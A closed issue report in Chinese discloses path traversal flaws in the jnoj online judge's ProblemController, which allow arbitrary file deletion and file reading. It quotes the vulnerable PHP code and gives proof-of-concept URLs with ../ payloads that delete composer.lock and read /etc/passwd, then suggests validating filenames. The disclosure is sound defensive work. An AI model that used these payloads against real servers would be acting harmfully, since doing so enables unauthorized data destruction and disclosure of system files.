Closed
Description
1.任意文件删除
代码 app\modules\polygon\controllers\ProblemController 89行到113行
public function actionDeletefile($id, $name)
{
$model = $this->findModel($id);
if ($name == 'in') {
$files = $model->getDataFiles();
foreach ($files as $file) {
if (strpos($file['name'], '.in')) {
@unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
}
}
} else if ($name == 'out') {
$files = $model->getDataFiles();
foreach ($files as $file) {
if (strpos($file['name'], '.out')) {
@unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
}
if (strpos($file['name'], '.ans')) {
@unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
}
}
} else {
@unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $name);
}
return $this->redirect(['test-data', 'id' => $model->id]);
}
unlink的时候没有对传入的文件做校验,可以导致任意文件删除,请求url
http://127.0.0.1/jnoj/web/polygon/problem/deletefile?id=1&name=../../../../jnoj/composer.lock
2.任意文件读取
代码 app\modules\polygon\controllers\ProblemController 115行到121行
public function actionViewfile($id, $name)
{
$model = $this->findModel($id);
echo '<pre>';
echo file_get_contents(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $name);
echo '</pre>';
}
请求url
http://127.0.0.1/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd
修复建议:对传入的文件名称做校验.
Metadata
Metadata
Assignees
Labels
No labels

